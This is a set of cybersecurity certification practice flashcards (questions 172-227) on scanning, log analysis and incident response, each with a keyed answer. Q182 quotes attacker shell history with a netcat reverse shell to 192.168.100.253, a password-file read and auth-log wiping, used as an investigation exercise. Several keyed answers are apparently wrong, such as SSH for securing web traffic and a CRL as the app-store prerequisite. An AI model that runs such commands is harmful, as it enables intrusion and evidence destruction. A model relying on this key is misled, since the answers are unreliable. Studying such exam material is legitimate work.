c. The Apache server was patched before the scan was completed.
d. The package manager includes backported versions of Apache.

A

d. The package manager includes backported versions of Apache

172
Q
  1. A company’s new vulnerability scanner produces many false positives, which require manual vulnerability testing every month. Most of the false positives are caused by the scanner’s inability to determine if a compensating control has been implemented at the OS or application level.

a. Increasing the scanner’s sensitivity level
b. Decreasing the time between vulnerability feed updates
c. Utilizing a SCAP tool
d. Implementing a credentialed scan

A

d. Implementing a credentialed scan

173
Q
  1. A credentialed scan has discovered a potential information disclosure vulnerability on a web server. A security administrator reviews the following associated logs to determine the validity of the result:
    Web Server Logs
    192.168.1.10 - "GET ../../../../c:\Users\Administrator\Documents\Server.pfx HTTP/1.0" - 200
    DLP Logs
    PERMIT 192.168.1.10 Server.pfx
    Which of the following should the administrator infer from the above information?

a. IIS needs to be patched for directory traversal.
b. The vulnerability is a false positive.
c. The DLP system provides adequate compensating control.
d. An exception must be configured in the vulnerability scanner.

A

d. An exception must be configured in the vulnerability scanner.

174
Q
  1. The Chief Information Security Officer (CISO) wants to gather information on attacks happening in real-time against a network of smaller size and operation. Which of the following would MOST likely be implemented to achieve this objective?

a. Honeypot
b. Airgapped network
c. Dockers
d. Honeynet

A

d. Honeynet

175
Q
  1. A security analyst needs to know which types of broadcast and multicast traffic are normally operating on the LAN where the analyst is concerned. The LAN is on network 10.10.20.0/23, connected to eth0. Which of the following open-source tools and commands should the analyst use to find the information and establish a baseline?

a. nmap --script=broad* -e eth0
b. nmap -sV -sU -p 1-65535 10.10.21.255
c. ping 10.10.21.255
d. ping 10.10.20.255
e. nmap -sV -sU -p 1-65565 10.10.20.0/23

A

a. nmap --script=broad* -e eth0

176
Q
  1. When performing reverse engineering, which of the following file types would be MOST easily decompiled into source code?

a. .so
b. .exe
c. .jar
d. .a

A

c. .jar

177
Q
  1. A new system was built recently using the SDLC process, and the validation process must ensure the system is behaving correctly. During the process, the development team notices the system is behaving as it should, except for a few bugs within an in-house application. Which of the following validation methods should be implemented to remediate this issue?

a. User validation
b. Code validation
c. Function validation
d. Recurring validation

A

c. Function validation

178
Q
  1. A security analyst is trying to determine the OS of an unidentified device on the network. A scan produces the following result:
    PORT STATE SERVICE
    135/tcp open rpc
    139/tcp open netbios-ssn
    445/tcp open ds
    3389/tcp open term-serv
    4455/tcp open upnotifyp
    14000/tcp open scotty-ft
    Which of the following is MOST likely the unknown device’s operating system?

a. Windows
b. Linux
c. Solaris
d. FreeBSD
e. MacOS

A

a. Windows

179
Q
  1. A cybersecurity analyst is securing a server that will host an e-commerce web application. Which of the following actions will be required to prevent the financial data from being transferred in cleartext? (Select TWO).

a. Allow traffic to port 1433 and deny everything else.
b. Set up the webserver to use the NULL cipher suite.
c. Get a certificate from a reputable certificate authority.
d. Configure the webserver to use the latest SSH protocol.
e. Allow traffic to port 443 and deny everything else.

A

c. Get a certificate from a reputable certificate authority.

d. Configure the webserver to use the latest SSH protocol.

180
Q
  1. A systems administrator is concerned that a server may be compromised. A security analyst notices the following log output while aiding with the investigation.
    July 23 01:35:10 LINSERV01 useradd[30245]: failed adding user ‘hjasole’, data deleted
    July 23 01:35:10 LINSERV01 passwd[30246]: password for ‘hjasole’ changed by ‘root’
    July 23 01:35:12 LINSERV01 passwd[30263]: password for ‘mroch’ changed by ‘root’
    July 23 01:38:10 LINSERV01 useradd[30523]: failed adding user ‘apache’, data deleted
    July 23 01:42:48 LINSERV01 passwd[32532]: password for ‘sleeman’ changed by ‘root’
    July 23 01:47:07 LINSERV01 useradd[633]: failed adding user ‘mysql’, data deleted
    Which of the following types of activities is the threat actor attempting?

a. Gain persistence
b. Password brute-forcing
c. Pivoting
d. Elevation of privilege

A

b. Password brute-forcing

181
Q
  1. A Modbus/TCP Function Code Information Disclosure vulnerability is indicative of:

a. mobile phones.
b. virtualization hosts.
c. VPN concentrators.
d. SCADA systems.

A

d. SCADA systems.

182
Q
  1. While investigating an incident, a security analyst reviews the output of the history command on a Linux machine. The analyst receives the following output:
    cd /etc/
    ls -al
    cat password
    sudo nc 192.168.100.253 -e /bin/bash
    cd /var/log/
    sudo echo " " > /var/log/auth.log
    sudo useradd system -g wheel,sshuser -u 899
    touch -/system
    Which of the following should the analyst conclude from the analysis of this output?

a. Persistence has been established on port 899.
b. A user who is not visible from the GUI has been added.
c. Log files in /var/log/ have been deleted.
d. A listener has been established on 192.168.100.253.

A

d. A listener has been established on 192.168.100.253.

183
Q
  1. A security analyst is conducting a vulnerability assessment of older SCADA devices on the corporate network. Which of the following compensating controls is likely to prevent the scans from providing value?

a. Access control list network segmentation that prevents access to the SCADA devices inside the network
b. Detailed and tested firewall rules that effectively prevent outside access of the SCADA devices
c. Implementation of a VLAN that allows all devices on the network to see all SCADA devices on the network
d. SCADA systems configured with ‘SCADA SUPPORT’=ENABLE

A

a. Access control list network segmentation that prevents access to the SCADA devices inside the network

184
Q
  1. New regulations have come out that require a company to conduct regular vulnerability scans. Not wanting to be found with a vulnerability during an audit, the company wants the most accurate and complete vulnerability scan. Which of the following BEST meets this objective?

a. Regression scan
b. Port scan
c. SCAP scan
d. Agent-based scan

A

d. Agent-based scan

185
Q
  1. A security analyst is capturing network traffic on a web server that is suspected of using the DNS service for exfiltrating information out of the network. The server usually transfers several gigabytes of data per day, and the analyst wants the size of the capture to be as reduced as possible. Which of the following commands should the analyst use to achieve such goals?

a. tcpdump tcp port 53 -i eth0 -w evidence1.pcap
b. tcpdump udp port 53 -i eth0 -w evidence1.pcap
c. tcpdump port 53 -i eth0 -w evidence1.pcap
d. tcpdump -i eth0 -w evidence1.pcap

A

b. tcpdump udp port 53 -i eth0 -w evidence1.pcap

186
Q
  1. A cyber-incident response team is responding to a network intrusion incident on a hospital network. Which of the following must the team prepare to allow the data to be used in court as evidence?

a. Computer forensics form
b. HIPAA response form
c. Chain of custody form
d. Incident form

A

c. Chain of custody form

187
Q
  1. An analyst is reviewing data from a host that recently established a persistent TCP connection to a network over the Internet. The connection was first established outbound around 2:53 p.m. on July. The external IP is associated with a known C2 enclave. The analyst is now beginning to investigate how the code established an outbound connection, but logs are limited. The analyst is reviewing the following additional information.
    Antivirus log snippets:
    20180722 08:33:12 Info AV Client v1.4.2 started
    20180722 09:45:00 Info Definition updated to Rev. B000002293883; OK
    ...
    20180722 14:33:11 Info Inspect new process Word.exe completed; OK
    20180722 14:43:15 Info Inspect file C:\Users\Robin\Documents\weeklystatus.doc completed; OK
    20180722 14:43:59 Info Inspect new process Outlook.exe completed; OK
    20180722 14:49:17 Info Inspect file C:\Users\Robin\Downloads\emailbackup.pst completed; OK
    20180722 14:52:19 Warn Inspect new process Outlook.exe failed; cannot read
    20180722 14:55:46 Info Inspect new process Outlook.exe completed; OK
    ...
    Event logs (application):
    ...
    07222018 143311 EDT Word.exe started
    07222018 144302 EDT Word.exe write to C:\Users\Robin\Documents\Weeklystatus.doc
    07222018 144359 EDT Outlook.exe started
    07222018 144917 EDT Outlook.exe write to C:\Users\Robin\Downloads\emailbackup.pst
    07222018 145219 EDT Outlook.exe fatal error BES unknown 0000000 var 15.1.3221.1000
    07222018 145219 EDT Outlook.exe closed unexpectedly, non-recoverable
    07222018 145546 EDT Outlook.exe started
    Based on the limited available information, which of the following MOST likely occurred?

a. The user downloaded the malicious C2 application and saved it to the PST file, which caused code execution.
b. Word.exe was vulnerable to command execution, and the C2 application written to weeklystatus.doc and then executed
c. The user clicked a spear-phishing link in an email, which exploited an unsecured OS function call vulnerability in the web browser.
d. A vulnerable Outlook.exe opened an email that exploited a buffer overrun vulnerability, providing arbitrary code execution.

A

d. A vulnerable Outlook.exe opened an email that exploited a buffer overrun vulnerability, providing arbitrary code execution.

188
Q
  1. An analyst performed the following activities:
    1. Review the security logs.
    2. Install a surveillance camera.
    3. Analyze trend reports.
    Which of the following job responsibilities is the analyst performing? (Select TWO)

a. Detect a security incident
b. Reduce the attack surface of the system.
c. Implement monitoring controls.
d. Harden network devices.
e. Prevent unauthorized access.
f. Encrypt the devices.

A

b. Reduce the attack surface of the system.

c. Implement monitoring controls.

189
Q
  1. A security analyst is performing a manual penetration test on the company’s web server. A formal agreement from the Chief Information Officer (CIO) documents that an eight-hour window over the weekend is allowable to perform the testing. Shortly after starting the test, the analyst discovers a critical vulnerability that would allow unauthorized remote guests to access internal company resources. Which of the following should the analyst do after discovering this vulnerability?

a. Stop the testing and report the vulnerability to the CIO for guidance.
b. Continue the penetration test to complete it within the eight-hour time frame.
c. Pause the test to make the necessary changes to resolve the issue.
d. Log a ticket detailing the vulnerability and continue to test.

A

b. Continue the penetration test to complete it within the eight-hour time frame.

190
Q
  1. A company has a large number of users who need to access corporate resources or networks from various locations. Many users have VPN access to the network, as well as wireless internet access from BYOD-approved systems, tablets, and smartphones. The users can also access corporate resources from an Internet-facing web portal; however, all of these services require a separate set of credentials. Which of the following should the cybersecurity analyst recommend to aggregate and audit all logins while allowing corporate directory services credentials to be shared across all of the services?

a. SAML
b. Kerberos
c. SSO
d. RADIUS

A

c. SSO

191
Q
  1. A security analyst is investigating some unusual network traffic to and from one of the company’s email servers. Reviewing a packet capture, the analyst notes the following sequence of packets:
    67.35.20.70 74.125.131.27 TCP 61234 -> smtp (25) [SYN] Seq=0 Win=29200 Len=0
    74.125.131.27 67.35.20.70 TCP smtp (25) -> 61234 [SYN, ACK] Seq=0 Ack=1 Win=29312 Len=0
    67.35.20.70 74.125.131.27 TCP 61234 -> smtp (25) [ACK] Seq=1 Ack=1 Win=29312 Len=0
    67.35.20.70 74.125.131.27 SMTP S: 250 mx.ehlo
    74.125.131.27 67.35.20.70 SMTP S: 250 mx.yahoo.com saying hello
    68.35.20.70 74.125.131.27 TCP 61234 -> smtp (25) [ACK] Seq=7 Ack=219 Win=30336 Len=0
    68.35.20.70 74.125.131.27 SMTP C: quit
    209.53.215.34 74.125.131.27 TCP 59139 -> http (80) [ACK] Seq=1 Ack=1 Win=4128 Len=0
    74.125.131.27 209.53.215.34 SSH Server: Protocol (SSH-2.0-Cisco-1.25)
    209.53.215.34 74.125.131.27 SSH Client: Protocol (SSH-1.99-Cisco-1.25)
    74.125.131.27 209.53.215.34 SSHv2 Server: Key Exchange Init
    153.22.17.8 74.125.131.27 TCP 61234 -> smtp (25) [SYN] Seq=0 Win=29200 Len=0
    74.125.131.27 153.22.17.8 TCP smtp (25) -> 61234 [SYN, ACK] Seq=0 Ack=1 Win=42540 Len=0
    74.125.131.27 153.22.17.8 SMTP S: 220 mx.google.com ESMTP q8si1038396vcq.58 - gsmtp
    153.22.17.8 74.125.131.27 TCP 61234 -> smtp (25) [ACK] Seq=1 Ack=25 Win=29312 Len=0
    153.22.17.8 74.125.131.27 SMTP C: ehlo
    74.125.131.27 153.22.17.8 TCP smtp (25) -> 61234 [ACK] Seq=52 Ack=7 Win=42624 Len=0
    74.125.131.27 153.22.17.8 SMTP S: 250 mx.google.com at your service
    153.22.17.8 74.125.131.27 SMTP C: quit
    Which of the following should be the NEXT step in the investigation?

a. Log on the server at IP address 74.125.131.27 and determine the process using port 80
b. Log on the server at IP address 74.125.131.27 and determine the process using port 25.
c. Check with the network team to see if the IP address 67.35.20.70 has connected to any other services.
d. Ask the network team to blackhole the IP address 153.22.17.8 to prevent further connections.

A

d. Ask the network team to blackhole the IP address 153.22.17.8 to prevent further connections.

192
Q
  1. A company website has been compromised. A security analyst reviews the latest SIEM report to attempt to discover how the attack occurred. The SIEM contains the following entries.
    File not found on server “web01.company.com” exceeded 24 times
    /var/www/html/drupal 3 times 12.17.224.131
    /var/www/html/typepad 3 times 12.17.224.131
    /var/www/html/blog 3 times 12.17.224.131
    /var/www/html/disqus 3 times 12.17.224.131
    /var/www/html/git 3 times 12.17.224.131
    /var/www/html/svn 3 times 12.17.224.131
    /var/www/html/cvs 3 times 12.17.224.131
    /var/www/html/blogger 3 times 12.17.224.131
    Access denied on server “web01.company.com” exceeded 24 times
    User : root 4 times 12.17.224.131
    User : admin 4 times 12.17.224.131
    User : administratrator 4 times 12.17.224.131
    User : wpuser 4 times 12.17.224.131
    User : wpadmin 4 times 12.17.224.131
    User : wordpress 4 times 12.17.224.131
    Given the above logs, which of the following MOST likely occurred, causing the compromise? (Select TWO).

a. The attacker utilized a list of the most common content management systems to discover if the server was running one.
b. The attacker tried several directory traversal attacks to see if any were susceptible to the more common vulnerabilities.
c. The attacker avoided tripping any alerts by staying under the default alert threshold counts with each attack attempt.
d. The attacker used a focused set of the most common account names to attempt to gain access to the website
e. The attacker enumerated the list of authors who post on the website and attempted to log in as each of them.

A

a. The attacker utilized a list of the most common content management systems to discover if the server was running one.
e. The attacker enumerated the list of authors who post on the website and attempted to log in as each of them.

193
Q
  1. An analyst is reviewing a list of vulnerabilities, which were reported from a recent vulnerability scan of a Linux server. Which of the following is MOST likely to be a false positive?

a. OpenSSH/OpenSSL package Random Number Generator Weakness
b. Apache HTTP Server Byte Range DoS
c. GDI+ Remote Code Execution Vulnerability (MS08-052)
d. HTTP TRACE / TRACK Methods Allowed (002-1208)
e. SSL Certificate Expire

A

c. GDI+ Remote Code Execution Vulnerability (MS08-052)

194
Q
  1. An analyst is detecting Linux machines on a Windows network. Which of the following tools should be used to detect a computer operating system?

a. whois
b. netstat
c. nmap
d. Nslookup

A

c. nmap

195
Q
  1. A data center manager just received an SMS alert that a server cage was accessed using an authorized code. The manager does not recall receiving a notification by email for any scheduled maintenance on servers in the cage. Which of the following is the FIRST step the manager should take?

a. Check the change management logs at the earliest convenience to determine if the change was authorized.
b. Remotely access the server and change the password to prevent the intruder from accessing the system.
c. Request a firewall administrator to implement an ACL to contain any potential damage.
d. Call the security guard to investigate the situation.

A

d. Call the security guard to investigate the situation.

196
Q
  1. An organization recently had its strategy posted on a social media website. The document posted to the website is an exact copy of a document stored on only one server in the organization. A security analyst sees the following output from a command-line entry on the server suspected of the problem.
    Active Connections
    Proto Local Address Foreign Address State PID Process Name
    TCP 192.168.13.5 11.13.100.7 ESTABLISHED 422 (firefox.exe)
    TCP 192.168.13.5 34.11.110.9 ESTABLISHED 516 (firefox.exe)
    TCP 192.168.13.5 144.10.62.7 ESTABLISHED 773 (firefox.exe)
    TCP 192.168.13.5 0.0.0.0 LISTENING 123 (svchost.exe)
    Which of the following would be the BEST course of action?

a. Remove the malware associated with PID 773.
b. Monitor all the established TCP connections for data exfiltration.
c. Investigate the malware associated with PID 123.
d. Block all TCP connections at the firewall.
e. Figure out which of the Firefox processes is the malware.

A

a. Remove the malware associated with PID 773.

197
Q
  1. An audit has revealed that the database administrator is also responsible for auditing database changes and backup logs. Which of the following access control methodologies would BEST mitigate this concern?

a. Time-of-day restriction
b. Separation of duties
c. Principle of least privilege
d. Role-based access control

A

c. Principle of least privilege

198
Q
  1. An organization with a small IT department deploys the following security capabilities but is struggling with aggregating and analyzing security logs:
    - Enterprise antivirus
    - Layer 7 firewalls
    - Network-based IPS
    - DLP appliance
    The security administrator is concerned with the lack of event correlation and the inability to dedicate more resources to a SIEM and its monitoring. Which of the following should the company implement to BEST resolve this issue?

a. Cloud-based SIEM
b. Security as a service
c. Automated reporting
d. Centralized Syslog

A

a. Cloud-based SIEM

199
Q
  1. A security administrator needs to create an IDS rule to alert on FTP login attempts by root. Which of the following rules is the BEST solution?

a. alert udp any any -> root any -> 21
b. alert tcp any any -> any 21 (content: “root”)
c. alert tcp any any -> any root 21
d. alert tcp any any -> any root (content: “ftp”)

A

b. alert tcp any any -> any 21 (content: “root”)

200
Q
  1. An organization is performing vendor selection activities for penetration testing, and a security analyst is reviewing the MOA and rules of engagement, which were supplied with proposals. Which of the following should the analyst expect will be included in the document and why?

a. The scope of the penetration test should be included in the MOA to ensure penetration testing is conducted against only specifically authorized network resources.
b. The MOA should address the client SLA in relation to reporting results to regulatory authorities, including issuing banks for organizations that process cardholder data.
c. The rules of engagement should include detailed results of the penetration scan, including all findings, as well as the designation of whether vulnerabilities identified during the scanning phases are found to be exploitable during the penetration test.
d. The exploitation standards should be addressed in the rules of engagement to ensure both parties are aware of the depth of exploitation that will be attempted by penetration testers.

A

d. The exploitation standards should be addressed in the rules of engagement to ensure both parties are aware of the depth of exploitation that will be attempted by penetration testers.

201
Q
  1. A security architect is reviewing the options for performing input validation on incoming web form submissions. Which of the following should the architect suggest as the MOST secure and manageable option?

a. Client-side whitelisting
b. Server-side whitelisting
c. Server-side blacklisting
d. Client-side blacklisting

A

b. Server-side whitelisting

202
Q
  1. A cybersecurity analyst is conducting packet analysis on the following:
    Time Source Destination Info
    0.000353 00:43.b3:3f:23:e3 ff:ff:ff:ff:ff:ff Who has 172.16.45.2017 Tell 172.16.1.7
    Which of the following is occurring in the given packet?

a. ARP request
b. ARP reply
c. Ping request
d. Ping reply
e. MAC filtering
f. IP spoofing

A

a. ARP request

203
Q
  1. The computer incident response team at a multinational company has determined that a breach of sensitive data has occurred in which a threat actor has compromised the organization’s email system. Per the incident response procedures, this breach requires notifying the board immediately. Which of the following would be the BEST method of communication?

a. Post on the company blog
b. Corporate-hosted encrypted email
c. VoIP phone call
d. Summary sent by certified mail
e. Externally hosted instant message

A

d. Summary sent by certified mail

204
Q
  1. A company installs ICS devices to manage the building’s lighting controls. The network administrator places the controllers on a VLAN segment of the company’s network. After a month, senior management reports someone has been modifying the lights on the building floors after hours to spell words on the building. The security administrator is tasked with resolving the issue immediately and stopping access to the ICS devices. Which of the following is the BEST method to quickly secure the devices for controlling the lights at a minimum cost to the company?

a. Configure a network for separating the devices from the business network
b. Create a group policy to blacklist the ICS web applications on company devices.
c. Change the default password on the ICS devices to restrict user access.
d. Add a different privileged account on the ICS devices.

A

a. Configure a network for separating the devices from the business network

205
Q
  1. A business recently installed a kiosk that is running on a hardened operating system as a restricted user. The kiosk application is the only application that is allowed to run. A security analyst gets a report that pricing data is being modified on the server, and management wants to know how this is happening. After reviewing the logs, the analyst discovers the root account from the kiosk is accessing the files. After validating the permission on the server, the analyst confirms the permissions from the kiosk do not allow access to write to the server data. Which of the following is the MOST likely reason for the pricing data modifications on the server?

a. Data on the server is not encrypted, allowing users to change the pricing data.
b. The kiosk user account has execute permission on the server data files.
c. Customers are logging off the kiosk and guessing the root account password
d. Customers are escaping the application shell and gaining root-level access

A

d. Customers are escaping the application shell and gaining root-level access

206
Q
  1. A small company is publishing a new web application to receive customer feedback related to its products. The web server will only host a form to receive the customer feedback and store it in a local database. The web server is placed in a DMZ network, and web service and file systems have been hardened. However, the cybersecurity analyst discovers data from the database can be mined from over the Internet. Which of the following should the cybersecurity analyst recommend be done to provide temporary mitigation from unauthorized access to the database?

a. Configure the database to listen for incoming connections on the internal network.
b. Change the database connection string and apply the necessary patches.
c. Configure an ACL in the border firewall to block all connections to the web server for ports other than 80 and 443.
d. Deploy a web application firewall to protect the web application from attacks to the Database.

A

c. Configure an ACL in the border firewall to block all connections to the web server for ports other than 80 and 443.

207
Q
  1. A security analyst has concluded that suspicious intermittent network activity is coming from one or more systems using random IP addresses and MAC addresses. The same IP or MAC address is not used twice. Which of the following is the BEST course of action to identify the source of the suspicious activity when it resumes?

a. Configure a dynamic sinkhole.
b. Review the firewall logs.
c. Trace down to the switchport.
d. Review the network IDS logs.

A

c. Trace down to the switchport.

208
Q
  1. The SCADA team reported unusually high memory usage on two servers they attributed to the monitoring software installed on them. There was also a PowerShell script executing at random intervals without any user interaction. The antivirus and HIDS reports were clean. However, the change detection report showed several high-range ports were opened and services were started in the last week. Which of the following is the best NEXT step to respond to this incident?

a. Isolate the devices on the network.
b. Increase the server’s memory.
c. Apply new antivirus and HIDS signatures.
d. Disable PowerShell.

A

a. Isolate the devices on the network.

209
Q
  1. A company is developing its first mobile application, which will be distributed via the official application stores of the two major mobile platforms. Which of the following is a prerequisite to making the applications available in the application stores?

a. Distribute user certificates.
b. Deploy machine/computer certificates.
c. Obtain a code-signing certificate.
d. Implement a CRL.

A

d. Implement a CRL.

210
Q
  1. Risk management wants IT to implement a solution that will permit an analyst to intercept, execute, and analyze potentially malicious files that are downloaded from the Internet. Which of the following would BEST provide this solution?

a. File fingerprinting
b. Decomposition of malware
c. Risk evaluation
d. Sandboxing

A

d. Sandboxing

211
Q
  1. The Chief Information Security Officer (CISO) is reviewing the latest threat intel, and there are indications of a new threat that targets Windows-based hosts on port 514. The CISO wants to prepare to mitigate the threat by identifying any assets that may be affected. The initial scan returns the following incomplete information:
    Scan report for WTBAC_10312000
    Host is up (0.014s latency)
    Not shown: 995 filtered port
    Port State Service
    22/tcp open ssh
    443/tcp open https
    444/tcp open snpp
    514/tcp open shell
    2222/tcp closed Ethernet/IP-1
    MAC Address : 00:0C:29:15:4a:1F (VMware)
    Which of the following commands should be used to provide the correct information for the CISO?

a. nmap -sS 170.20.10.0/24
b. nmap -sV -O 172.20.10.0/24
c. nessus -q -x -T html <172.20.10.23> .txt 172.20.10.0/24
d. nmap -v -Pn -sU -sT -p , T:21-25, 80, 139, 514 172.20.10.0/24

A

b. nmap -sV -O 172.20.10.0/24

212
Q
  1. A company office was broken into over the weekend. The office manager contacts the IT security group to provide details on which servers were stolen. The security analyst determines one of the stolen servers contained a list of customers’ PII, and another server contained a copy of the credit card transactions processed on the Friday before the break-in. In addition to the potential security implications of information that could be gleaned from those servers and the rebuilding/restoring of the data on the stolen systems, the analyst needs to determine any communication or notification requirements with respect to the incident. Which of the following items is MOST important when determining what information needs to be provided, who should be contacted, and when the communication needs to occur?

a. Total number of records stolen
b. Government and industry regulations
c. Impact on the reputation of the company’s name/brand
d. Monetary value of data stolen

A

b. Government and industry regulations

213
Q
  1. An organization wants to perform network scans to identify active hosts and vulnerabilities. Management places the highest priority on scans that mimic how an attack would progress. If time and resources allow, subsequent scans can be performed using different techniques and methods. Which of the following scan types and sequences would BEST suit the organization’s requirements?

a. Non-credentialed scans followed by credentialed scans.
b. Credentialed scans followed by compliance scans
c. Compliance scans followed by credentialed scans
d. Compliance scans followed by non-credentialed scans

A

a. Non-credentialed scans followed by credentialed scans.

214
Q
  1. A security analyst must perform quarterly vulnerability scans to keep the organization in compliance with PCI regulations. The analyst has scheduled the scans to occur early on Monday morning and uses Nexpose on 192.168.65.32 to run scans on the entire network. The morning after the scan was run, the analyst received the following alert from the network-based IDS system.
    XXE Attack Detected
    Source:
        192.168.65.32
    Destination:
        192.168.70.35
        192.168.70.36
        192.168.70.37
        192.168.70.38
        192.168.70.39
    An XXE attack was detected originating from an internal IP address; further investigation is needed to determine if the internal device is compromised. Which of the following would be the BEST way to address this alert while remaining in compliance with PCI regulations?

a. Create a firewall rule restricting traffic from 192.168.65.32 to the 192.168.70 network
b. Isolate 192.168.65.32 and begin incident response procedures on the device
c. Disable any services that are vulnerable to XXE attacks on the destination servers.
d. Validate that the alert is a false positive triggered by the scanning process

A

d. Validate that the alert is a false positive triggered by the scanning process

215
Q
  1. A security engineer is trying to determine why there are traffic spikes from a new storage server fleet at 2:00 a.m. every weekday. The engineer suspects the server fleet was compromised by a supply chain attack and engages a forensics firm to analyze the configuration and software stack. The forensics analysis gives the storage server fleet a clean bill of health. Which of the following is the MOST likely explanation for what is occurring in this scenario?

a. Scheduled network-based backups are occurring on the new fleet
b. The traffic graphs have misattributed the load to the storage fleet.
c. There is a nation-state attack and subverted forensic analysis.
d. There is stealthy C2 malware phoning home

A

a. Scheduled network-based backups are occurring on the new fleet

216
Q
  1. Following the development of a company’s new online application, a security analyst is brought in to test the site’s security before going live. The analyst is given the following URL and credentials.
    https://app.company.com/Guest
    User ID: UserBob
    Password : S#7h&sh*g

After logging in, the URL changes to the following, and the system displays a screen with graphs of various data points.
https://app.company.com/User/dashboard.php?view=graphs

Which of the following is the BEST choice for a reasonable test of circumventing the site’s security?

a. Try different combinations of credentials and passwords.
b. Use the browser’s “View Source” feature to see the underlying HTML.
c. Browse explicitly to the URL https://app.company.com/Admin
d. Alter the URL parameters to dashboard.php?view=charts

A

c. Browse explicitly to the URL https://app.company.com/Admin

217
Q
  1. During the annual review and testing of incident response, the analyst determines that assets involved in an incident are isolated, reimaged, and then returned to service. A review of the lessons learned from the incident shows that further research on the cause of the incident may be needed, including providing data to external sources like law enforcement in the event criminal activity is suspected. Which of the following tools would be appropriate to recommend to the Chief Information Security Officer (CISO) to provide encompassing support for incident response and forensics?

a. Shasum
b. EnCase
c. DD
d. MRTG

A

b. EnCase

218
Q
  1. A security analyst is trying to interpret the results of the following packet capture to see if there is any suspicious activity.
    2.717757 192.168.1.110 -> 192.168.1.132 TCP 58 45571 > 53 [SYN] Seq=0 Win=3072 Len=0 MSS=1460
    2.717914 192.168.1.110 -> 192.168.1.132 TCP 58 45571 > 443 [SYN] Seq=0 Win=4096 Len=0 MSS=1460
    2.718227 192.168.1.110 -> 192.168.1.132 TCP 58 45572 > 80 [SYN] Seq=0 Win=3072 Len=0 MSS=1460
    2.719234 192.168.1.110 -> 192.168.1.132 TCP 58 45572 > 21 [SYN] Seq=0 Win=3072 Len=0 MSS=1460
    2.719469 192.168.1.110 -> 192.168.1.132 TCP 58 45573 > 3389 [SYN] Seq=0 Win=1024 Len=0 MSS=1460
    2.719943 192.168.1.110 -> 192.168.1.132 TCP 58 45572 > 25 [SYN] Seq=0 Win=2048 Len=0 MSS=1460
    2.720418 192.168.1.110 -> 192.168.1.132 TCP 58 45572 > 22 [SYN] Seq=0 Win=3072 Len=0 MSS=1460
    Which of the following BEST describes this packet capture?

a. It shows normal DNS request traffic among users and servers.
b. It shows an attempted PING sweep of the network devices.
c. It shows a network server responding to various web requests in order.
d. It shows an attempted port scan of the network devices.

A

d. It shows an attempted port scan of the network devices.

219
Q
  1. After reviewing wireless network traffic logs, a security analyst notices an unusual number of handshakes. Which of the following is MOST likely happening?

a. TCP reset of connections
b. Rainbow table decryption
c. Forced TLS downgrading
d. Forced deauthorization

A

d. Forced deauthorization

220
Q
  1. Which of the following is a vulnerability that is specific to hypervisors?

a. DDoS
b. VLAN hopping
c. Weak encryption
d. VM escape

A

d. VM escape

221
Q
  1. A malicious hacker wants to gather guest credentials on a hotel 802.11 network. Which of the following tools is the malicious hacker going to use to gain access to information found on the hotel network?

a. Nikto
b. Aircrack-ng
c. Nessus
d. tcpdump

A

b. Aircrack-ng

222
Q
  1. An alert is issued from the SIEM that indicates a large number of failed logins for the same account name on one of the application servers starting at 10:20 a.m. No other significant failed login activity is detected. Using Splunk to search for activity pertaining to that account name, a security analyst finds the account … morning. The account is attempting to authenticate from an internal server that is running a database to an application server. No other security activity is detected on the network. The analyst discovers the account owner is a developer who no longer works for the company. Which of the following is the MOST likely reason for the failed login attempts for that account?

a. The account that is failing to authenticate has not been maintained, and the company password change policy time frame has been reached for that account.
b. The host-based firewall is blocking port 389 LDAP communications, preventing the login credentials from being received by the application server.
c. The license for the application has expired, and the failed logins will continue to occur until a new license key is installed on the application.
d. A successful malware attack has provided someone access to the network, and the failed login attempts are an indication of an attempt to gain privileged access to the application.

A

a. The account that is failing to authenticate has not been maintained, and the company password change policy time frame has been reached for that account.

223
Q
  1. A security analyst is reviewing the most recent company scan results. Multiple Linux systems do not return any results. A comparison of the previous report, however, shows these same systems had several open vulnerabilities. Which of the following steps should the security analyst take NEXT?

a. Submit the results to operations for validation of remediation.
b. Ensure the systems are available to the scanner.
c. Submit the remediation report to management to illustrate progress.
d. Ensure kernel access is granted to the scanner for authentication.

A

b. Ensure the systems are available to the scanner.

224
Q
  1. An analyst is conducting a log review and identifies the following snippet in one of the logs.
    Jun 10 07:09:10 databse1 sshd[24665] : Invalid user root from 101.79.130.213
    Jun 10 07:36:03 databse1 sshd[24901] : Invalid user root from 101.79.130.213
    Jun 10 07:42:44 databse1 sshd[24938] : Invalid user root from 101.79.130.213
    Jun 10 07:56:11 databse1 sshd[26570] : Invalid user root from 101.79.130.213
    Jun 10 08:02:55 databse1 sshd[30144] : Invalid user root from 101.79.130.213
    Which of the following MOST likely caused this activity?

a. SQL injection
b. Privilege escalation
c. Forgotten password
d. Brute force

A

d. Brute force

225
Q
  1. A penetration test for the internal DNS service of a company is scheduled, and the security analyst uses the tcpdump udp port 53 -i eth0 command to get a packet capture from the DNS server that will be used to confirm any findings. During the daily report meeting, the penetration tester reports a zone transfer vulnerability using the dig -axfr command against the server. The analyst opens the packet capture from the day before, but there are no traces of the transfer. Which of the following is the MOST likely cause of this issue?

a. A false positive was reported by the penetration tester.
b. The packet analyzer software does not support DNS protocol parsing
c. The zone transfer used a different protocol.
d. The zone transfer happened before the packet capture started.
e. The DNS zone transfer used a different port and was filtered out of the capture.
f. Tcpdump does not support capturing DNS packets.

A

e. The DNS zone transfer used a different port and was filtered out of the capture.

226
Q
  1. A system is experiencing noticeably slow response time, and users are being locked out frequently. An analyst asked for the system security plan and found the system comprises two servers: an application server in the DMZ and a database server inside the trusted domain. Which of the following should be performed NEXT to investigate the availability issue?

a. Review the firewall logs.
b. Review syslogs from critical servers.
c. Perform fuzzing.
d. Install a WAF in front of the application server.

A

b. Review syslogs from critical servers.

227
Q
  1. A systems administrator at a company notices an unknown, randomly named process running on a database server that contains several terabytes of personal and account data for customers. Reviewing the server, the administrator notices the process was installed and began running two days ago. Database logs stored off the server indicate unusual queries were run but not against tables containing personal and account data. Network logs show encrypted network traffic at minimal levels to an external IP address that began shortly after the process started and ended at midnight yesterday when the threat intelligence feed automatically blocked the IP address. Which of the following is the BEST course of action?

a. Kill the process, quarantine the server, and begin examining the logs of other devices to which this server has connectivity.
b. Contact all customers with records in the database to let them know their information may have been compromised.
c. Kill the process, delete it from the server to prevent it from spreading, and restore a backup of the server.
d. Leave the process running and remove the network block, allowing the administrator to study the process and determine its purpose

A

a. Kill the process, quarantine the server, and begin examining the logs of other devices to which this server has connectivity.

228
Q
